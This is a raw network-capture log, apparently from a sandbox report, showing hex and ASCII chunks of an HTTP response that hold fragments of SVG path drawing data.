                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4414INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4430INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                                                                                                                                        Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4446INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4462INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                                        Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4478INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                                                                                                                                        Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4494INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4511INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                                        Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4527INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4543INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                                                                                                                                        Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4559INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                                                                                                                                        Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4575INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4591INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4607INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                                        Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4623INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4639INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                                        Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4655INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4671INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                                                        Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
